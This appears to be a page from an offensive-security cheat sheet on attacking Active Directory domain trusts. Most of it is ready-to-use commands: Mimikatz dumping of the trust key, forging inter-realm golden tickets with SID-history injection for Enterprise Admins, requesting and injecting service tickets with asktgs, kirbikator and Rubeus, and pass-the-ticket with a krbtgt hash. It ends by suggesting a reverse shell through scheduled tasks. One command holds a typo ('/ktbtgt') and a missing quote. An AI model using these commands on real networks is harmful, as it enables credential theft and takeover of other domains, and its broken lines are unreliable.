TRUST BASED DOMAIN ATTACKS

USING TRUST KEY

We need Domain Admin privileges to extract trust key and perform attacks across domains with trust

To get the domain trust key using Mimikatz

Invoke-Mimikatz -Command '"lsadump::trust /patch"'

Create a Inter-Realm TGT for the target domain

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<ATTACKER DOMAIN NAME> /sid:<ATTACKER DOMAIN SID> /sids:<TARGET DOMAIN SID>-<RID> /rc4:<TRUST KEY> /service:krbtgt /target:<TARGET DOMAIN NAME> /ticket:<TICKET PATH>"'

For specific roles the RID will change. Some important RIDs are,

Enterprise Admins - 519
Schema Admins - 518
Domain Admins - 512

Requesting a TGS from target domain using Inter-Realm TGT for Target Domain's DC

.\asktgs.exe <PATH TO TGT> CIFS/<TARGET DOMAIN>

Presenting the TGS to the service

.\kirbikator.exe lsa <TGS PATH>

Or we can use Rubeus to request and present the TGS from TGT

.\Rubeus.exe asktgs /ticket:<TRUST TGT> /service:cifs/<TARGET DOMAIN NAME> /dc:<DC OF TARGET DOMAIN> /ptt

USING KRBTGT HASH

Instead of Domain Trust Key, we are using krbtgt hash to request a TGT

Create a Inter-Realm TGT for the target domain

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<ATTACKER DOMAIN NAME> /sid:<ATTACKER DOMAIN SID> /sids:<TARGET DOMAIN SID>-<RID> /ktbtgt:<KRBTGT NTLM> /service:krbtgt /target:<TARGET DOMAIN NAME> /ticket:<TICKET PATH>"

Executing Pass The Ticket attack with the saved TGT

Invoke-Mimikatz -Command '"kerberos::ptt <TGT PATH>"'

Try accessing WMI queries, If WMI query output displays

You can use HOST protocol also

Try spawning reverse shell via scheduled tasks

PreviousCONSTRAINED DELEGATION NextABUSING MS-SQL TRUST

Last updated 2 years ago